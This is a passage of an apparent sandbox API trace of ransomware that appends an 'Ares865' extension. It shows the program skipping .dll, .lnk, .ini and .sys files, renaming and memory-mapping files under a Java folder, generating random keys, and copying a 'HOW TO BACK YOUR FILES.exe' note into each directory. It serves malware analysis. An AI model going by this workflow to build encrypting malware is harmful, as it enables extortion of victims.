dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0131.353] GetLastError () returned 0x0 [0131.354] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0131.354] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52924cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52924cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0131.354] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.354] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0131.354] lstrcpyW (in: lpString1=0x2cce442, lpString2="bin" | out: lpString1="bin") returned="bin" [0131.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0131.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed8f8 [0131.354] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0131.354] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0131.354] lstrcmpiW (lpString1="COPYRIGHT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.354] lstrcmpiW (lpString1="COPYRIGHT", lpString2="aoldtz.exe") returned 1 [0131.355] lstrcpyW (in: lpString1=0x2cce442, lpString2="COPYRIGHT" | out: lpString1="COPYRIGHT") returned="COPYRIGHT" [0131.355] lstrlenW (lpString="COPYRIGHT") returned 9 [0131.355] lstrlenW (lpString="Ares865") returned 7 [0131.355] lstrcmpiW (lpString1="PYRIGHT", lpString2="Ares865") returned 1 [0131.355] lstrlenW (lpString=".dll") returned 4 [0131.355] lstrcmpiW (lpString1="COPYRIGHT", lpString2=".dll") returned 1 [0131.355] lstrlenW (lpString=".lnk") returned 4 [0131.355] lstrcmpiW (lpString1="COPYRIGHT", lpString2=".lnk") returned 1 [0131.355] lstrlenW (lpString=".ini") returned 4 [0131.355] lstrcmpiW (lpString1="COPYRIGHT", lpString2=".ini") returned 1 [0131.355] lstrlenW (lpString=".sys") returned 4 [0131.355] lstrcmpiW (lpString1="COPYRIGHT", lpString2=".sys") returned 1 [0131.355] lstrlenW (lpString="COPYRIGHT") returned 9 [0131.355] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.Ares865") returned 50 [0131.355] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright.ares865"), dwFlags=0x1) returned 1 [0131.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.357] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3409) returned 1 [0131.357] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.358] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.358] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.358] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1060, lpName=0x0) returned 0x170 [0131.360] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1060) returned 0x190000 [0131.361] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.363] lstrcpyW (in: lpString1=0x2cce442, lpString2="lib" | out: lpString1="lib") returned="lib" [0131.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0131.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed798 [0131.363] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0131.363] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0131.363] lstrcmpiW (lpString1="LICENSE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0131.363] lstrcmpiW (lpString1="LICENSE", lpString2="aoldtz.exe") returned 1 [0131.363] lstrcpyW (in: lpString1=0x2cce442, lpString2="LICENSE" | out: lpString1="LICENSE") returned="LICENSE" [0131.363] lstrlenW (lpString="LICENSE") returned 7 [0131.363] lstrlenW (lpString="Ares865") returned 7 [0131.363] lstrlenW (lpString=".dll") returned 4 [0131.363] lstrcmpiW (lpString1="LICENSE", lpString2=".dll") returned 1 [0131.363] lstrlenW (lpString=".lnk") returned 4 [0131.363] lstrcmpiW (lpString1="LICENSE", lpString2=".lnk") returned 1 [0131.363] lstrlenW (lpString=".ini") returned 4 [0131.363] lstrcmpiW (lpString1="LICENSE", lpString2=".ini") returned 1 [0131.363] lstrlenW (lpString=".sys") returned 4 [0131.363] lstrcmpiW (lpString1="LICENSE", lpString2=".sys") returned 1 [0131.363] lstrlenW (lpString="LICENSE") returned 7 [0131.364] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\LICENSE.Ares865") returned 48 [0131.364] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\LICENSE" (normalized: "c:\\program files (x86)\\java\\jre7\\license"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\LICENSE.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\license.ares865"), dwFlags=0x1) returned 1 [0131.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\LICENSE.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\license.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.366] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41) returned 1 [0131.366] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.367] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.367] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.367] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x170 [0131.369] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x190000 [0131.370] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.370] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.370] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.371] lstrcpyW (in: lpString1=0x2cce442, lpString2="README.txt" | out: lpString1="README.txt") returned="README.txt" [0131.371] lstrlenW (lpString="README.txt") returned 10 [0131.371] lstrlenW (lpString="Ares865") returned 7 [0131.371] lstrcmpiW (lpString1="DME.txt", lpString2="Ares865") returned 1 [0131.371] lstrlenW (lpString=".dll") returned 4 [0131.371] lstrcmpiW (lpString1="README.txt", lpString2=".dll") returned 1 [0131.371] lstrlenW (lpString=".lnk") returned 4 [0131.371] lstrcmpiW (lpString1="README.txt", lpString2=".lnk") returned 1 [0131.371] lstrlenW (lpString=".ini") returned 4 [0131.371] lstrcmpiW (lpString1="README.txt", lpString2=".ini") returned 1 [0131.371] lstrlenW (lpString=".sys") returned 4 [0131.371] lstrcmpiW (lpString1="README.txt", lpString2=".sys") returned 1 [0131.371] lstrlenW (lpString="README.txt") returned 10 [0131.372] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\README.txt.Ares865") returned 51 [0131.372] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt.ares865"), dwFlags=0x1) returned 1 [0131.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47) returned 1 [0131.373] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.374] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x170 [0131.377] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x190000 [0131.377] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.378] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.379] lstrcpyW (in: lpString1=0x2cce442, lpString2="release" | out: lpString1="release") returned="release" [0131.379] lstrlenW (lpString="release") returned 7 [0131.379] lstrlenW (lpString="Ares865") returned 7 [0131.379] lstrlenW (lpString=".dll") returned 4 [0131.379] lstrcmpiW (lpString1="release", lpString2=".dll") returned 1 [0131.379] lstrlenW (lpString=".lnk") returned 4 [0131.379] lstrcmpiW (lpString1="release", lpString2=".lnk") returned 1 [0131.379] lstrlenW (lpString=".ini") returned 4 [0131.379] lstrcmpiW (lpString1="release", lpString2=".ini") returned 1 [0131.379] lstrlenW (lpString=".sys") returned 4 [0131.379] lstrcmpiW (lpString1="release", lpString2=".sys") returned 1 [0131.379] lstrlenW (lpString="release") returned 7 [0131.379] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\release.Ares865") returned 48 [0131.379] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\release" (normalized: "c:\\program files (x86)\\java\\jre7\\release"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\release.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\release.ares865"), dwFlags=0x1) returned 1 [0131.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\release.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\release.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.386] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=506) returned 1 [0131.387] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.388] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x170 [0131.390] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x190000 [0131.391] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.392] lstrcpyW (in: lpString1=0x2cce442, lpString2="THIRDPARTYLICENSEREADME-JAVAFX.txt" | out: lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned="THIRDPARTYLICENSEREADME-JAVAFX.txt" [0131.392] lstrlenW (lpString="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 34 [0131.392] lstrlenW (lpString="Ares865") returned 7 [0131.392] lstrcmpiW (lpString1="AFX.txt", lpString2="Ares865") returned -1 [0131.392] lstrlenW (lpString=".dll") returned 4 [0131.392] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2=".dll") returned 1 [0131.392] lstrlenW (lpString=".lnk") returned 4 [0131.392] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2=".lnk") returned 1 [0131.393] lstrlenW (lpString=".ini") returned 4 [0131.393] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2=".ini") returned 1 [0131.393] lstrlenW (lpString=".sys") returned 4 [0131.393] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2=".sys") returned 1 [0131.393] lstrlenW (lpString="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 34 [0131.393] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.Ares865") returned 75 [0131.393] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt.ares865"), dwFlags=0x1) returned 1 [0131.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=125105) returned 1 [0131.395] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.396] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.396] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.396] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ebc0, lpName=0x0) returned 0x170 [0131.397] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ebc0) returned 0x190000 [0131.403] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.406] lstrcpyW (in: lpString1=0x2cce442, lpString2="THIRDPARTYLICENSEREADME.txt" | out: lpString1="THIRDPARTYLICENSEREADME.txt") returned="THIRDPARTYLICENSEREADME.txt" [0131.406] lstrlenW (lpString="THIRDPARTYLICENSEREADME.txt") returned 27 [0131.406] lstrlenW (lpString="Ares865") returned 7 [0131.406] lstrcmpiW (lpString1="DME.txt", lpString2="Ares865") returned 1 [0131.406] lstrlenW (lpString=".dll") returned 4 [0131.406] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2=".dll") returned 1 [0131.406] lstrlenW (lpString=".lnk") returned 4 [0131.406] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2=".lnk") returned 1 [0131.406] lstrlenW (lpString=".ini") returned 4 [0131.406] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2=".ini") returned 1 [0131.406] lstrlenW (lpString=".sys") returned 4 [0131.406] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2=".sys") returned 1 [0131.407] lstrlenW (lpString="THIRDPARTYLICENSEREADME.txt") returned 27 [0131.407] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.Ares865") returned 68 [0131.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt.ares865"), dwFlags=0x1) returned 1 [0131.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.409] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=176976) returned 1 [0131.410] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.410] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.410] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.410] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2b650, lpName=0x0) returned 0x170 [0131.412] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b650) returned 0x420000 [0131.420] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.421] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.423] lstrcpyW (in: lpString1=0x2cce442, lpString2="Welcome.html" | out: lpString1="Welcome.html") returned="Welcome.html" [0131.423] lstrlenW (lpString="Welcome.html") returned 12 [0131.423] lstrlenW (lpString="Ares865") returned 7 [0131.424] lstrcmpiW (lpString1="me.html", lpString2="Ares865") returned 1 [0131.424] lstrlenW (lpString=".dll") returned 4 [0131.424] lstrcmpiW (lpString1="Welcome.html", lpString2=".dll") returned 1 [0131.424] lstrlenW (lpString=".lnk") returned 4 [0131.424] lstrcmpiW (lpString1="Welcome.html", lpString2=".lnk") returned 1 [0131.424] lstrlenW (lpString=".ini") returned 4 [0131.424] lstrcmpiW (lpString1="Welcome.html", lpString2=".ini") returned 1 [0131.424] lstrlenW (lpString=".sys") returned 4 [0131.424] lstrcmpiW (lpString1="Welcome.html", lpString2=".sys") returned 1 [0131.424] lstrlenW (lpString="Welcome.html") returned 12 [0131.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.Ares865") returned 53 [0131.424] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html.ares865"), dwFlags=0x1) returned 1 [0131.426] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.426] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=983) returned 1 [0131.427] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.428] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x170 [0131.429] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0131.430] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.432] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib") returned="C:\\Program Files (x86)\\Java\\jre7\\lib" [0131.432] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib") returned="C:\\Program Files (x86)\\Java\\jre7\\lib" [0131.432] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0131.432] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\how to back your files.exe"), bFailIfExists=1) returned 0 [0131.433] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0131.433] GetLastError () returned 0x0 [0131.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0131.434] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5294ae20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5294ae20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0131.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.434] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0131.434] lstrcpyW (in: lpString1=0x2cce44a, lpString2="accessibility.properties" | out: lpString1="accessibility.properties") returned="accessibility.properties" [0131.434] lstrlenW (lpString="accessibility.properties") returned 24 [0131.434] lstrlenW (lpString="Ares865") returned 7 [0131.434] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0131.434] lstrlenW (lpString=".dll") returned 4 [0131.434] lstrcmpiW (lpString1="accessibility.properties", lpString2=".dll") returned 1 [0131.434] lstrlenW (lpString=".lnk") returned 4 